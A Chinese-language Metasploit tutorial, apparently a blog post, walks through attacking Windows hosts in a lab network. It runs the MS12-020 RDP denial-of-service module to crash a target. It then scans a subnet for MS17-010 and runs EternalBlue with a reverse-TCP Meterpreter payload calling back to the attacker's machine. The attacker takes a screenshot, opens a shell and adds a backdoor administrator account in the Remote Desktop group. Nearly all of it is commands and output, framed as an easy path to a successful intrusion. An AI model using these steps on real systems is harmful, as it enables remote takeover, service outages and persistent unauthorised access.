Metasploit

Metasploit是什么？Metasploit是一個免費的、可下載的框架，通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊。它是附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具。

如果這樣很難理解，我們換個說法；每天都有無數(shù)的漏洞被發(fā)現(xiàn)，如果我們每個人都收集幾種并匯聚到一起，修改為相同的操作方式，這就是msf在做的；msf初衷是做一個攻擊工具開發(fā)平臺，但現(xiàn)在更多的情況下msf淪為了業(yè)余安全愛好者和安全專家的武器庫，只需要點幾下鼠標，就能入侵成功。

MS12-020

MS12-020是一個針對遠程桌面(RDP)協(xié)議的漏洞，其最嚴重的情況可能會造成遠程執(zhí)行代碼，而通常情況下會造成對方藍屏。

利用方法

msfconsole 從終端進入msf框架

查找漏洞代碼

msf > search 12_020 

[!] Module database cache not built yet, using slow search Matching Modules ================   Name                                              Disclosure Date  Rank    Description   ----                                              ---------------  ----    -----------   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS   auxiliary/scanner/rdp/ms12_020_check                               normal  MS12-020 Microsoft Remote Desktop Checker

使用該漏洞利用代碼

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

查看使用方法

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST                   yes       The target address   RPORT  3389             yes       The target port (TCP)

漏洞模塊為auxiliary/dos/windows/rdp/ms12_020_maxchannelids
參數(shù)為 RHOST目標地址，RPORT目標端口。

設置參數(shù)

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.136.129 RHOST => 192.168.136.129

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RPORT 3389 RPORT => 3389

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST  192.168.136.129  yes       The target address   RPORT  3389             yes       The target port (TCP)

運行

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit 

[*] 192.168.136.129:3389 - 192.168.136.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS [*] 192.168.136.129:3389 - 192.168.136.129:3389 - 210 bytes sent [*] 192.168.136.129:3389 - 192.168.136.129:3389 - Checking RDP status... [+] 192.168.136.129:3389 - 192.168.136.129:3389 seems down [*] Auxiliary module execution completed

攻擊完成

對方藍屏

MS12-020是msf中利用比較簡單的一種，可以用來學習msf的框架的簡單使用方法，又能快速增加入侵成功的成就感。

MS17-010(永恒之藍)

永恒之藍是2017年席卷全球的勒索軟件的罪魁禍首，是微軟近些年來最為嚴重的遠程代碼執(zhí)行漏洞，可以直接獲得系統(tǒng)權(quán)限，請所有IT從業(yè)人員在任何時候都要打滿補丁以絕后患。

利用方法

進入msf框架

root@kali:~# msfconsole

查找MS17-010相關(guān)利用代碼

search 17_010 

[!] Module database cache not built yet, using slow searchMatching Modules ================   Name                                      Disclosure Date  Rank     Description   ----                                      ---------------  ----     -----------   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

檢測內(nèi)網(wǎng)中存在漏洞的主機系統(tǒng)

   msf > use auxiliary/scanner/smb/smb_ms17_010    

msf auxiliary(scanner/smb/smb_ms17_010) > show options        

Module options (auxiliary/scanner/smb/smb_ms17_010):           Name         Current Setting                                                 Required  Description       ----         ---------------                                                 --------  -----------       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check       RHOSTS                                                                       yes       The target address range or CIDR identifier       RPORT        445                                                             yes       The SMB service port (TCP)       SMBDomain    .                                                               no        The Windows domain to use for authentication       SMBPass                                                                      no        The password for the specified username       SMBUser                                                                      no        The username to authenticate as       THREADS      1                                                               yes       The number of concurrent threads        

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24    RHOSTS => 192.168.136.129/24    

msf auxiliary(scanner/smb/smb_ms17_010) > exploit            

[*] Scanned  26 of 256 hosts (10% complete)    [*] Scanned  52 of 256 hosts (20% complete)    [*] Scanned  77 of 256 hosts (30% complete)    [*] Scanned 103 of 256 hosts (40% complete)    [*] Scanned 128 of 256 hosts (50% complete)    [+] 192.168.136.129:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

加載攻擊模塊

msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 

msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):   Name                Current Setting  Required  Description   ----                ---------------  --------  -----------   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.   GroomDelta          5                yes       The amount to increase the groom count by per try.   MaxExploitAttempts  3                yes       The number of times to retry the exploit.   ProcessName         spoolsv.exe      yes       Process to inject payload into.   RHOST                                yes       The target address   RPORT               445              yes       The target port (TCP)   SMBDomain           .                no        (Optional) The Windows domain to use for authentication   SMBPass                              no        (Optional) The password for the specified username   SMBUser                              no        (Optional) The username to authenticate as   VerifyArch          true             yes       Check if remote architecture matches exploit Target.   VerifyTarget        true             yes       Check if remote OS matches exploit Target. Exploit target:   Id  Name   --  ----   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

配置

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129RHOST => 192.168.136.129

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp 

msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131LHOST => 192.168.136.131

msf exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):   Name                Current Setting  Required  Description   ----                ---------------  --------  -----------   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.   GroomDelta          5                yes       The amount to increase the groom count by per try.   MaxExploitAttempts  3                yes       The number of times to retry the exploit.   ProcessName         spoolsv.exe      yes       Process to inject payload into.   RHOST               192.168.136.129  yes       The target address   RPORT               445              yes       The target port (TCP)   SMBDomain           .                no        (Optional) The Windows domain to use for authentication   SMBPass                              no        (Optional) The password for the specified username   SMBUser                              no        (Optional) The username to authenticate as   VerifyArch          true             yes       Check if remote architecture matches exploit Target.   VerifyTarget        true             yes       Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     192.168.136.131  yes       The listen address   LPORT     4444             yes       The listen port Exploit target:   Id  Name   --  ----   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

發(fā)動攻擊

msf exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.136.131:4444 [*] 192.168.136.129:445 - Connecting to target for exploitation. [+] 192.168.136.129:445 - Connection established for exploitation. [+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes) [*] 192.168.136.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2[*] 192.168.136.129:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris [*] 192.168.136.129:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P [*] 192.168.136.129:445 - 0x00000030  61 63 6b 20 31                                   ack 1           [+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.136.129:445 - Sending all but last fragment of exploit packet [*] 192.168.136.129:445 - Starting non-paged pool grooming [+] 192.168.136.129:445 - Sending SMBv2 buffers [+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.136.129:445 - Sending final SMBv2 buffers. [*] 192.168.136.129:445 - Sending last fragment of exploit packet! [*] 192.168.136.129:445 - Receiving response from exploit packet [+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.136.129:445 - Sending egg to corrupted connection. [*] 192.168.136.129:445 - Triggering free of corrupted buffer. [*] Sending stage (206403 bytes) to 192.168.136.129[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800[+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

獲取對方電腦桌面

meterpreter >  screenshot 

Screenshot saved to: /root/VrBAGsTE.jpeg

獲得shell權(quán)限

meterpreter > shell

Process 4088 created.Channel 1 created.Microsoft Windows [?汾 6.1.7601]??????? (c) 2009 Microsoft Corporation???????????????C:\Windows\system32>

添加管理員并加入遠程桌面組

net user test test123 /add

net user localgroup administrators test /add

net localgroup "Remote Desktop Users" test /add




完成入侵。

MS17-010在msf里屬于中等使用難度，涉及了掃描、配置回鏈方式、桌面抓圖、提權(quán)等手段，是非常好的學習對象。